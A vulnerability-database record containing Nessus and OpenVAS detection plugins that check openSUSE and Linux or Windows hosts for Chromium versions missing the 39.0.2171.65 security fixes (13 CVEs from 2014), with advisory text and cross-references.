{"id": "OPENSUSE-2014-764.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : chromium (openSUSE-SU-2014:1626-1)", "description": "chromium was updated to version 39.0.2171.65 to fix 13 security\nissues.\n\nThese security issues were fixed :\n\n - Use-after-free in pepper plugins (CVE-2014-7906).\n\n - Buffer overflow in OpenJPEG before r2911 in PDFium, as\n used in Google Chromebefore 39.0.2171.65, al...\n (CVE-2014-7903).\n\n - Uninitialized memory read in Skia (CVE-2014-7909).\n\n - Unspecified security issues (CVE-2014-7910).\n\n - Integer overflow in media (CVE-2014-7908).\n\n - Integer overflow in the opj_t2_read_packet_data function\n infxcodec/fx_libopenjpeg/libopenjpeg20/t2....\n (CVE-2014-7901).\n\n - Use-after-free in blink (CVE-2014-7907).\n\n - Address bar spoofing (CVE-2014-7899).\n\n - Buffer overflow in Skia (CVE-2014-7904).\n\n - Use-after-free vulnerability in the CPDF_Parser\n (CVE-2014-7900).\n\n - Use-after-free vulnerability in PDFium allows DoS\n (CVE-2014-7902).\n\n - Flaw allowing navigation to intents that do not have the\n BROWSABLE category (CVE-2014-7905).\n\n - Double-free in Flash (CVE-2014-0574).", "published": "2014-12-15T00:00:00", "modified": "2014-12-15T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/79997", "reporter": "This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://lists.opensuse.org/opensuse-updates/2014-12/msg00048.html", "https://bugzilla.opensuse.org/show_bug.cgi?id=906327", "https://bugzilla.opensuse.org/show_bug.cgi?id=906322", "https://bugzilla.opensuse.org/show_bug.cgi?id=906330", "https://bugzilla.opensuse.org/show_bug.cgi?id=906321", "https://bugzilla.opensuse.org/show_bug.cgi?id=906318", "https://bugzilla.opensuse.org/show_bug.cgi?id=906317", "https://bugzilla.opensuse.org/show_bug.cgi?id=906323", "https://bugzilla.opensuse.org/show_bug.cgi?id=906324", "https://bugzilla.opensuse.org/show_bug.cgi?id=906319", "https://bugzilla.opensuse.org/show_bug.cgi?id=906326", "https://bugzilla.opensuse.org/show_bug.cgi?id=906328", "https://bugzilla.opensuse.org/show_bug.cgi?id=906320"], "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7905", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "type": "nessus", "lastseen": "2021-01-20T12:28:05", "edition": 18, "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310851108", "OPENVAS:1361412562310804892", "OPENVAS:1361412562310804894", "OPENVAS:1361412562310842037", "OPENVAS:1361412562310804797", "OPENVAS:1361412562310804893", "OPENVAS:1361412562310850624", "OPENVAS:1361412562310804794", "OPENVAS:1361412562310804793", "OPENVAS:1361412562310121299"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2015:0725-1", "OPENSUSE-SU-2014:1444-1", "SUSE-SU-2014:1442-1", "OPENSUSE-SU-2014:1626-1"]}, {"type": "freebsd", "idList": ["D395E44F-6F4F-11E4-A444-00262D5ED8EE"]}, {"type": "nessus", "idList": ["GOOGLE_CHROME_38_0_2125_122.NASL", "GENTOO_GLSA-201412-13.NASL", "MACOSX_GOOGLE_CHROME_39_0_2171_65.NASL", "REDHAT-RHSA-2014-1894.NASL", "MACOSX_ADOBE_AIR_15_0_0_356.NASL", "UBUNTU_USN-2410-1.NASL", "FREEBSD_PKG_D395E44F6F4F11E4A44400262D5ED8EE.NASL", "SMB_KB3004150.NASL", "GOOGLE_CHROME_39_0_2171_65.NASL", "REDHAT-RHSA-2014-1852.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:DCCF6E08CBB78DDE988D0C3CB0E04C1A"]}, {"type": "archlinux", "idList": ["ASA-201411-11", "ASA-201411-26"]}, {"type": "redhat", "idList": ["RHSA-2014:1894", "RHSA-2014:1852"]}, {"type": "ubuntu", "idList": ["USN-2410-1"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31430", "SECURITYVULNS:VULN:14118"]}, {"type": "cve", "idList": ["CVE-2014-7907", "CVE-2014-7902", "CVE-2014-7906", "CVE-2014-7903", "CVE-2014-7905", "CVE-2014-7900", "CVE-2014-7904", "CVE-2014-7909", "CVE-2014-7901", "CVE-2014-7899"]}, {"type": "gentoo", "idList": ["GLSA-201412-13", "GLSA-201411-06"]}, {"type": "hackerone", "idList": ["H1:37240"]}, {"type": "exploitdb", "idList": ["EDB-ID:34765", "EDB-ID:34895", "EDB-ID:36503", "EDB-ID:35115", "EDB-ID:36504", "EDB-ID:34777", "EDB-ID:35146", "EDB-ID:34879", "EDB-ID:34839", "EDB-ID:34766"]}], "modified": "2021-01-20T12:28:05", "rev": 2}, "score": {"value": 8.6, "vector": "NONE", "modified": "2021-01-20T12:28:05", "rev": 2}, "vulnersScore": 8.6}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-764.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79997);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0574\", \"CVE-2014-7899\", \"CVE-2014-7900\", \"CVE-2014-7901\", \"CVE-2014-7902\", \"CVE-2014-7903\", \"CVE-2014-7904\", \"CVE-2014-7905\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\", \"CVE-2014-7910\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-SU-2014:1626-1)\");\n script_summary(english:\"Check for the openSUSE-2014-764 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"chromium was updated to version 39.0.2171.65 to fix 13 security\nissues.\n\nThese security issues were fixed :\n\n - Use-after-free in pepper plugins (CVE-2014-7906).\n\n - Buffer overflow in OpenJPEG before r2911 in PDFium, as\n used in Google Chromebefore 39.0.2171.65, al...\n (CVE-2014-7903).\n\n - Uninitialized memory read in Skia (CVE-2014-7909).\n\n - Unspecified security issues (CVE-2014-7910).\n\n - Integer overflow in media (CVE-2014-7908).\n\n - Integer overflow in the opj_t2_read_packet_data function\n infxcodec/fx_libopenjpeg/libopenjpeg20/t2....\n (CVE-2014-7901).\n\n - Use-after-free in blink (CVE-2014-7907).\n\n - Address bar spoofing (CVE-2014-7899).\n\n - Buffer overflow in Skia (CVE-2014-7904).\n\n - Use-after-free vulnerability in the CPDF_Parser\n (CVE-2014-7900).\n\n - Use-after-free vulnerability in PDFium allows DoS\n (CVE-2014-7902).\n\n - Flaw allowing navigation to intents that do not have the\n BROWSABLE category (CVE-2014-7905).\n\n - Double-free in Flash (CVE-2014-0574).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906318\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906321\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906322\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906323\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906324\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906326\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906327\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906328\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=906330\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-12/msg00048.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-kde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromedriver-debuginfo-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debuginfo-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-debugsource-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-gnome-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-desktop-kde-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"chromium-ffmpegsumo-debuginfo-39.0.2171.65-58.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-debuginfo-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debuginfo-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debugsource-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-gnome-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-desktop-kde-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-39.0.2171.65-4.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-debuginfo-39.0.2171.65-4.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "79997", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium-desktop-gnome", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "cpe:/o:novell:opensuse:13.1", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo", "p-cpe:/a:novell:opensuse:chromium-desktop-kde"], "scheme": null}

{"openvas": [{"lastseen": "2020-01-31T18:39:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7905", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2014-12-13T00:00:00", "id": "OPENVAS:1361412562310850624", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850624", "type": "openvas", "title": "openSUSE: Security Advisory for chromium (openSUSE-SU-2014:1626-1)", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850624\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-12-13 05:53:58 +0100 (Sat, 13 Dec 2014)\");\n script_cve_id(\"CVE-2014-0574\", \"CVE-2014-7899\", \"CVE-2014-7900\", \"CVE-2014-7901\",\n \"CVE-2014-7902\", \"CVE-2014-7903\", \"CVE-2014-7904\", \"CVE-2014-7905\",\n \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\",\n \"CVE-2014-7910\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for chromium (openSUSE-SU-2014:1626-1)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"chromium was updated to version 39.0.2171.65 to fix 13 security issues.\n\n These security issues were fixed:\n\n - Use-after-free in pepper plugins (CVE-2014-7906).\n\n - Buffer overflow in OpenJPEG before r2911 in PDFium, as used in Google\n Chromebefore 39.0.2171.65, al... (CVE-2014-7903).\n\n - Uninitialized memory read in Skia (CVE-2014-7909).\n\n - Unspecified security issues (CVE-2014-7910).\n\n - Integer overflow in media (CVE-2014-7908).\n\n - Integer overflow in the opj_t2_read_packet_data function\n infxcodec/fx_libopenjpeg/libopenjpeg20/t2.... (CVE-2014-7901).\n\n - Use-after-free in blink (CVE-2014-7907).\n\n - Address bar spoofing (CVE-2014-7899).\n\n - Buffer overflow in Skia (CVE-2014-7904).\n\n - Use-after-free vulnerability in the CPDF_Parser (CVE-2014-7900).\n\n - Use-after-free vulnerability in PDFium allows DoS (CVE-2014-7902).\n\n - Flaw allowing navigation to intents that do not have the BROWSABLE\n category (CVE-2014-7905).\n\n - Double-free in Flash (CVE-2014-0574).\");\n\n script_tag(name:\"affected\", value:\"chromium on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:1626-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-gnome\", rpm:\"chromium-desktop-gnome~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-desktop-kde\", rpm:\"chromium-desktop-kde~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo\", rpm:\"chromium-ffmpegsumo~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-ffmpegsumo-debuginfo\", rpm:\"chromium-ffmpegsumo-debuginfo~39.0.2171.65~58.4\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-22T17:03:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2020-04-20T00:00:00", "published": "2014-11-25T00:00:00", "id": "OPENVAS:1361412562310804894", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804894", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities - 01 November14 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities - 01 November14 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804894\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-7900\", \"CVE-2014-7901\", \"CVE-2014-7902\", \"CVE-2014-7903\",\n \"CVE-2014-7904\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\",\n \"CVE-2014-7909\", \"CVE-2014-7910\", \"CVE-2014-7899\");\n script_bugtraq_id(71163, 71158, 71165, 71164, 71166, 71159, 71170, 71168,\n 71167, 71161, 71160);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-25 18:55:43 +0530 (Tue, 25 Nov 2014)\");\n script_name(\"Google Chrome Multiple Vulnerabilities - 01 November14 (Linux)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - A use-after-free error in pdfium.\n\n - An integer overflow error in pdfium.\n\n - Another use-after-free error in pdfium.\n\n - An unspecified error in pdfium.\n\n - An unspecified error in Skia.\n\n - A use-after-free error in pepper plugins.\n\n - Multiple use-after-free errors in blink.\n\n - An integer overflow error in media.\n\n - An unspecified error in Skia.\n\n - Other Multiple unspecified errors.\n\n - An unspecified error that can be exploited to spoof the address bar.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to disclose potentially sensitive information, conduct spoofing attacks,\n bypass certain security restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 39.0.2171.65\n on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 39.0.2171.65\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62546\");\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2014/11/stable-channel-update_18.html\");\n\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"39.0.2171.65\"))\n{\n report = report_fixed_ver(installed_version:chromeVer, fixed_version:\"39.0.2171.65\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-22T17:03:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2020-04-20T00:00:00", "published": "2014-11-25T00:00:00", "id": "OPENVAS:1361412562310804892", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804892", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities - 01 November14 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities - 01 November14 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804892\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-7900\", \"CVE-2014-7901\", \"CVE-2014-7902\", \"CVE-2014-7903\",\n \"CVE-2014-7904\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\",\n \"CVE-2014-7909\", \"CVE-2014-7910\", \"CVE-2014-7899\");\n script_bugtraq_id(71163, 71158, 71165, 71164, 71166, 71159, 71170, 71168,\n 71167, 71161, 71160);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-11-25 18:03:03 +0530 (Tue, 25 Nov 2014)\");\n script_name(\"Google Chrome Multiple Vulnerabilities - 01 November14 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - A use-after-free error in pdfium.\n\n - An integer overflow error in pdfium.\n\n - Another use-after-free error in pdfium.\n\n - An unspecified error in pdfium.\n\n - An unspecified error in Skia.\n\n - A use-after-free error in pepper plugins.\n\n - Multiple use-after-free errors in blink.\n\n - An integer overflow error in media.\n\n - An unspecified error in Skia.\n\n - Other Multiple unspecified errors.\n\n - An unspecified error that can be exploited to spoof the address bar.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to disclose potentially sensitive information, conduct spoofing attacks,\n bypass certain security restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 39.0.2171.65\n on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 39.0.2171.65\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62546\");\n script_xref(name:\"URL\", 